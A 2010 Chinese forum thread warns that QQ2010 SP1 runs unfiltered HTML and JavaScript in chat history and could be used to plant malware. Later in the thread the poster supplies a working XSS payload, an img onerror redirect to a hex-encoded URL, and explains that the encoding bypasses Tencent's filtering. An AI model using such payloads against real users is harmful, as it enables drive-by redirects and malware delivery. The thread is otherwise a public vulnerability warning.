QQ2010 SP1版本高危漏洞演示

kucoolzhu · 发表于 2010-7-28 17:50

QQ2010 SP1 版本在聊天记录以及消息盒子中没有过滤html及js
查看聊天记录的时候语句将被执行
别有目的的人可以构造特殊代码挂马以下是漏洞演示

建议：腾讯更新前停止使用QQ2010 SP1版本的QQ 如发现有人给你发送一堆乱七八糟的代码千万不要去查看聊天记录

花菜菜 · 发表于 2010-7-28 18:27

感觉好~专业

wilcool · 发表于 2010-7-28 18:33

谢谢帅哥提醒，TX太垃圾

benitt · 发表于 2010-7-28 18:55

幸好戒了qq了。

悲剧 · 发表于 2010-7-28 19:10

很强大

wilcool · 发表于 2010-7-28 23:45

TX有补丁了，不过要自己主动升级
帮助——在线升级
TX太黑了，既想挽回，又不敢公布！

神侃 · 发表于 2010-7-29 14:43

好专业

悲剧 · 发表于 2010-7-29 16:48

回复 6楼 wilcool

嗯。我已经更新掉了

Due · 发表于 2010-7-31 09:37

跪求代码

kucoolzhu · 发表于 2010-7-31 11:39

回复 9楼 Due

<img src='xz' onerror="window.location='\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x78\x7A\x6C\x62\x62\x2E\x63\x6F\x6D'"/>

复制代码

window.location=' '
单引号里是网址因为腾讯会处理正常的url所以经过了hex加密

Mr→Chen · 发表于 2010-8-1 11:02

相当强大

帐号		自动登录	找回密码
密码			会员注册